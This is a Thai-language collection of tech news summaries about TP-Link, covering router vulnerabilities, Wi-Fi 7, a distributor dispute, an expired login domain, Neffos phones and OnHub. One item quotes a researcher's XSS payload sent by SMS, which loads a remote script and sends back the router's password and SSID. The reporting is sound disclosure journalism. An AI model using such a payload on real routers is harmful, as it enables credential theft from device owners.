ไมโครซอฟท์รายงานถึงกลุ่มแฮกเกอร์ CovertNetwork-1658 จากจีนที่อาศัยช่องโหว่ของเราท์เตอร์ TP-Link เป็นส่วนใหญ่ เพื่อใช้เราท์เตอร์เหล่านี้ยิงรหัสผ่านเหยื่ออีกทีหนึ่ง

AIS ประกาศนำเทคโนโลยี Wi-Fi 7 (IEEE 802.11be) มาให้บริการในไทยเป็นรายแรก โดยร่วมกับพาร์ทเนอร์คือ TP-Link เป็นผู้ผลิตอุปกรณ์เราเตอร์ที่รองรับ Wi-Fi 7 เข้ามาให้บริการกับลูกค้า AIS Fibre แต่ยังไม่ประกาศกำหนดเวลาชัดเจน

Wi-Fi 7 เป็นสเปก Wi-Fi เวอร์ชันใหม่ที่พัฒนามาได้ระยะหนึ่งแล้ว และคาดว่าจะออกเป็นสเปกเวอร์ชันสมบูรณ์ในปีหน้า 2024 โดยปัจจุบันมีผู้ผลิตชิปสื่อสารหลายราย เช่น Broadcomm และ MediaTek พัฒนาชิปที่รองรับสเปก Wi-Fi 7 เวอร์ชันร่างไว้รอแล้ว

TP-Link เปิดตัวเราท์เตอร์รุ่นใหม่ในงาน CES 2022 ทั้งหมด 3 รุ่น โดยรุ่นที่เด่นเป็นพิเศษคือ Archer AXE200 Omni เราท์เตอร์ที่มาพร้อมกับเสาอากาศแบบเคลื่อนไหวได้เอง (robotic antenna) ทำให้สามารถสั่งปรับทิศทางเสาเพื่อเร่งความแรงสัญญาณได้

เสาอากาศของ Archer AXE200 Omni สามารถปรับเพื่อเน้นความแรงได้ 6 โหมด ได้แก่ รอบตัว, บนล่าง, หน้า, หลัง, ซ้าย, และขวา หรือจะสั่งผ่านแอปที่อุปกรณ์ที่กำลังใช้งานให้เราท์เตอร์ปรับเสามาหาผู้ใช้ก็ได้เช่นกัน

Matthew Garrett วิศวกรความมั่นคงปลอดภัยของกูเกิลรายงานถึงช่องโหว่ของซอฟต์แวร์บนเราท์เตอร์ TP-Link SR20 ที่เปิดให้แฮกเกอร์สามารถรันโค้ดด้วยสิทธิ์ root จากระยะไกลได้ โดยตอนนี้พ้นกำหนดการรายงาน 90 วันแล้วทาง TP-Link ไม่ได้ตอบกลับ เขาจึงเปิดเผยช่องโหว่และตัวอย่างการโจมตีสู่สาธารณะ

TP-Link SR20 เป็นเราท์เตอร์สำหรับ Wi-Fi พร้อมความสามารถในการควบคุมอุปกรณ์ IoT ทั้ง Zigbee และ Z-Wave แล้วเปิดให้ผู้ใช้เข้ามาควบคุมอีกทีผ่านแอป Kasa Smart โดยแอปนี้ได้รับความนิยมอย่างสูง บน Google Play มียอดติดตั้งกว่าล้านราย และให้ดาวถึง 34,871 ครั้ง เฉลี่ยถึง 4.7 ดาว

Jan Hörsch จากบริษัท Securai รายงานช่องโหว่ของเราท์เตอร์ 3G ของ TP-Link รุ่น M5350 ที่มีช่องโหว่ cross-site scripting (XSS) เปิดทางให้แฮกเกอร์สามารถยิงโค้ดจาวาสคริปต์ขึ้นไปรันได้

นักวิจัยทดสอบด้วยการยิง SMS <script src=//n.ms/a.j></script> เพื่อให้เราท์เตอร์นำโค้ดขึ้นไปรัน จากนั้นตัวสตริปต์จะส่ง SMS กลับมาเป็นรหัสผ่านและ SSID ของตัวเราท์เตอร์

เฟิร์มแวร์ที่พบช่องโหว่ออกมาตั้งแต่มกราคม 2015 รายงานครั้งเดียวกัน Hörsch ยังระบุถึงสินค้าตัวอื่นๆ เช่น Panasonic Retinascanner ที่มีช่องโหว่ในหน้าเว็บ และผู้ผลิตระบุเพียงว่าสินค้าเลิกผลิตและหมดอายุซัพพอร์ตไปแล้ว

ไม่เกี่ยวข้องกับประเด็นดราม่าในบ้านเรา TP-Link Technologies ได้เผยโฉมโลโก้ใหม่กับเว็บไซต์ CNET โดย Jefffrey Chao ประธานบอร์ดของ TP-LINK เปิดเผยว่าบริษัทออกแบบโลโก้ใหม่ เพื่อให้สอดคล้องวิสัยทัศน์และเป้าหมายใหม่ของบริษัท ที่จะหันไปเน้นอุปกรณ์สมาร์ทโฮมให้มากยิ่งขึ้น

TP-Link ได้ลงทุนกับ R&D เพื่อพัฒนาผลิตภัณฑ์สมาร์ทโฮมในสหรัฐมาได้ซักระยะ และเริ่มมีผลิตภัณฑ์และแอพออกมาบ้างแล้ว โดยประธาน TP-Link อธิบายว่า สีสันที่สดใส ความโค้งมนและสัญลักษณ์หัวลูกศร สะท้อนการมีปฏิสัมพันธ์ระหว่างลูกค้าและบริษัท

โลโก้ใหม่นี้ทาง TP-Link จะเปิดตัวอย่างเป็นทางการในงาน IFA ที่กรุงเบอร์ลินเดือนหน้าครับ

เป็นประเด็นดราม่าที่สืบเนื่องจากการประกาศ ยุติการจำหน่าย TP-Link ของ King I.T. และการ ถูกถอดออกจากตัวแทนจำหน่าย

ทางเพจเฟซบุ๊กของ King I.T. ได้ออกมาปฏิเสธหลังมีข่าวว่า King I.T ฉ้อโกงเงินมูลค่าถึง 60 ล้านบาท จากการหยุดจำหน่ายสินค้า TP-Link (เพจไม่ได้ระบุยี่ห้อ) พร้อมออกมาชี้แจงว่ามีหนี้ 60 ล้านบาทจริง โดยให้สาเหตุของการยังไม่ชำระหนี้ว่า เกรงว่าจะเสียเปรียบทางธุรกิจ โดยเฉพาะเรื่องการเคลมสินค้า ที่เวลาประกันสินค้ายังเหลืออีกมาก ประกอบกับการที่คู่ค้ารายเก่า (TP-Link) เสียมารยาททางธุรกิจในหลายประเด็น สามารถอ่านรายละเอียดทั้งหมดได้จากที่มาครับ

หมายเหตุ: ข่าวนี้เกี่ยวเนื่องมาจากข่าว FCC เตรียมออกกฎใหม่ ล็อกคลื่น Wi-Fi ในเราท์เตอร์ อาจกระทบการลงเฟิร์มแวร์โอเพนซอร์ส และ FCC ปรับแนวทางการล็อกคลื่นความถี่ให้ลงเฟิร์มแวร์โอเพนซอร์สได้ แต่ห้ามปรับความแรงและช่องสัญญาณ

จากกฎใหม่เรื่องความแรงของสัญญาณ FCC พบว่าเราเตอร์ยี่ห้อ TP-Link ละเมิดกฎข้อนี้ โดยตัวเฟิร์มแวร์ของ TP-Link รุ่นที่ขายในสหรัฐมีความแรงสัญญาณตามที่กำหนด แต่ TP-Link กลับเปิดให้ผู้ใช้เปลี่ยนค่า country code ได้เอง ส่งผลให้อาจเกิดปัญหาความแรงของสัญญาณเกินกว่าที่ FCC กำหนดได้

ต่อจากข่าว King I.T. ยุติการจำหน่ายผลิตภัณฑ์ TP-LINK และ TP-LINK ประกาศถอด คิงส์ ไอ.ที. อย่างเป็นทางการ

ทาง King I.T. ได้ส่งแถลงการณ์เพิ่มเติมมาให้ Blognone โดยมีใจความสำคัญดังนี้ (แถลงการณ์ฉบับเต็มท้ายข่าว)

• King I.T. ไม่ได้ลงนามสัญญาตัวแทนขาย TP-LINK มา 2 ปีแล้ว จึงแปลว่า TP-LINK ไม่ได้ถอด King I.T. ออกจากการเป็นตัวแทนจำหน่ายอย่างที่ TP-LINK กล่าวอ้าง และ King I.T. เป็นฝ่ายยุติการทำตลาดเอง
• ที่ผ่านมา King I.T. ได้รับประกันสินค้าจาก TP-LINK เพียง 26 เดือน ซึ่งหลังจากนั้น KING I.T. เป็นผู้รับประกันสินค้าแทนมาโดยตลอด
• สำหรับลูกค้าที่ซื้อสินค้า TP-LINK โดยเป็นประกันของ King I.T. อยู่ก่อน ยังสามารถเคลมประกันกับ King I.T. ได้เหมือนเดิม ถ้ายังมีสต๊อกสินค้าของรุ่นนั้น ก็จะได้สินค้ารุ่นเดิม ถ้าไม่มีสต๊อก จะให้ของเป็นยี่ห้อ Edimax แทนในสเปกที่เท่ากัน
• King I.T. ประกาศว่าได้เป็นตัวแทนจำหน่ายแบรนด์ TOTOLINK จากเกาหลีใต้เพิ่มด้วย โดยสินค้ายี่ห้อ TOTOLINK กับ Edimax จะได้ประกันแบบ Lifetime Forever ส่วนยี่ห้อ Netgear จะได้ประกัน 9 ปี

ต่อประเด็นจากข่าว ถึงเวลาเปลี่ยนมือ บ. King I.T. ยุติการจำหน่ายผลิตภัณฑ์ TP-LINK ล่าสุดมีประกาศจาก บริษัท ทีพี-ลิงค์ เอ็นเตอร์ไพรส์ (ประเทศไทย) จำกัด บนเพจของตน ในเนื้อความเดียวกัน ว่าบริษัท คิงส์ อินเทลลิเจ้นท์ เทคโนโลยี จำกัด มีการทำผิดเงื่อนไขทางธุรกิจเป็นเวลานาน จึงเป็นหตุให้ถอดสิทธิ์การจำหน่ายสินค้าของตน และจะชี้แจงรายละเอียดภายหลัง

และให้ Synnex และ STrek ดิสทริบิวเตอร์อุปกรณ์ฮาร์ดแวร์ดูแลการจำหน่ายและการบริการหลังการขายต่อไปครับ

ที่มา - TP-Link Facebook Page

บริษัท คิงส์ ไอ.ที. จำกัด (บริษัท คิงส์ อินเทลลิเจ้นท์ เทคโนโลยี จำกัด) ประกาศยุติการจำหน่ายสินค้าแบรนด์ TP-LINK อย่างเป็นทางการ อ้างอิงจากโพสต์บนหน้าเพจวันนี้ แต่ยังรับผิดชอบการรับประกันแบบ Lifetime ของตนอยู่ครับ

ในโพสต์เล่าถึงที่มาที่ไปของการเปลี่ยนแปลงองค์กรของ TP-LINK จากจีน ที่มาตั้งสำนักงานในประเทศไทยเองภายหลัง และแต่งตั้งตัวแทนขายเพิ่มนอกเหนือสัญญาในเวลาต่อมา จนเกิดความขัดแย้งกับบริษัทคิงส์ฯ ทั้งด้านนโยบายการรับประกันและการกำหนดราคา จึงต้องยุติการจัดจำหน่ายสินค้าแบรนด์นี้

ที่มา - KING I.T. Facebook Page

ช่วงหลังมานี้ ผู้ผลิตเราเตอร์ในบ้าน มักอำนวยความสะดวกให้ลูกค้าเข้าไปคอนฟิกอุปกรณ์ผ่านโดเมนเนม แทนการเข้าเว็บแบบ local ผ่านหมายเลขไอพีอย่างในอดีต (การเข้าเว็บผ่านโดเมนไม่ได้ออกสู่อินเทอร์เน็ตจริงๆ แต่เมื่อผู้ใช้ในเครือข่าย local เข้าเว็บดังกล่าว เราเตอร์จะส่งไปยังหน้าคอนฟิกอัตโนมัติ)

ตัวอย่างของ TP-Link ผู้ผลิตเราเตอร์จากจีน ใช้วิธีจดโดเมน tplinklogin.net และ tplinkwifi.net โดยแปะโดเมนไว้บนตัวเครื่องเลย อย่างไรก็ตาม มีคนค้นพบว่าบริษัทลืมต่ออายุโดเมน tplinklogin.net และโดเมนกลายเป็นของคนอื่นไปแล้ว (โดเมน tplinkwifi.net ยังเป็นของ TP-Link)

ปัจจุบันโดเมน tplinklogin.net ยังเป็นหน้าประกาศขายโดเมนอยู่ ฝั่งของผู้ใช้เราเตอร์ TP-Link คงไม่มีปัญหาในเรื่องนี้เพราะเราเตอร์จะส่งเข้าเว็บ local เสมอ แต่ก็มีความเสี่ยงว่าโดเมนนี้จะถูกใช้เป็น phising ดักข้อมูลจากผู้ใช้คนอื่นๆ ได้ในอนาคต

TP-Link ผู้ผลิตเราเตอร์ชื่อดัง ขยายตลาดมาทำสมาร์ทโฟนกับเขาบ้างด้วยแบรนด์ลูกชื่อ Neffos บริษัทเปิดตัวแผนก Neffos ช่วงปลายปี 2015 และเปิดตัวสมาร์ทโฟนชุดแรกอย่างรวดเร็วในชื่อ Neffos C5 Seriesแบ่งออกเป็น 2 รุ่นย่อย

• Neffos C5ใช้ซีพียู MediaTek MT6735 ควอดคอร์, แรม 2GB, รอม 16GB + microSD, หน้าจอ 5.5" Full HD, กล้อง 13MP/5MP, แบตเตอรี่ 2000 mAh
• Neffos C5Lใช้ซีพียู Snapdragon 210, แรม 1GB, รอม 8GB + microSD, หน้าจอ 4.5" FWVGA, กล้อง 8MP/2MP, แบตเตอรี่ 2000 mAh

มือถือทั้งสองรุ่นรองรับ 4G LTE Cat 4, ระบบปฏิบัติการ Android 5.1 ตัววัสดุเป็นโพลีคาร์บอเนต ตอนนี้ยังไม่เปิดราคาและวันวางขายครับ

กูเกิลร่วมมือกับ TP-Link เปิดตัวเราเตอร์ทรงกระบอกในชื่อ OnHub ซึ่งโฟกัสที่ความง่ายในการใช้งานและมีประสิทธิภาพสูง โดยผู้ใช้จะเซ็ตอัพและควบคุมมันด้วยแอพชื่อ Google On แอพตัวนี้จะบอกข้อมูลได้หลากหลาย เช่นขนาดแบนด์วิดท์ที่ใช้งานอยู่ หรือจำนวนอุปกรณ์ที่เชื่อมต่ออยู่ในเวลานั้น กูเกิลบอกว่าด้วยความที่มันเป็นทรงกระบอกทำให้สัญญาณที่ปล่อยออกมาสามารถทะลุทะลวงกำแพงได้ดีขึ้น อีกทั้งยังมีเสาอากาศภายในถึง 13 เสาเลยทีเดียว

สำหรับสเปกมีดังนี้

พบช่องโหว่แบบ backdoor ในเราท์เตอร์ TP-Link TL-WDR4300 และ TL-WR743ND มีช่องโหวทำให้สร้าง URL ที่สั่งให้เราท์เตอร์ดาวน์โหลดไฟล์ทาง TFTP ขึ้นมาเพื่อรันในสิทธิ root

บั๊กนี้มีผลให้แฮกเกอร์แม้อยู่ภายนอกก็สามารถโจมตีเราท์เตอร์ได้หากเปิดพอร์ต HTTP บนขา WAN เอาไว้ และแม้จะปิดพอร์ตบนขา WAN ก็ยังมีความเสี่ยงบ้างที่แฮกเกอร์จะอาศัยช่องโหว่ CSRF เพื่อเปิดช่องโหว่นี้ขึ้นมาได้ (แต่จะอัพโหลด TFTP ต้องใช้ช่องโหว่อื่น)

ปัญหานี้ถูกแจกไปยังทาง TP-Link เมื่อวันที่ 12 กุมภาพันธ์ที่ผ่านมา จนกระทั่งเมื่อครบ 30 วันหลังการแจ้งแล้วไม่มีการตอบกลับ ทีมงานจึงเปิดเผยปัญหาสู่สาธารณะ

ที่มา - Sekurak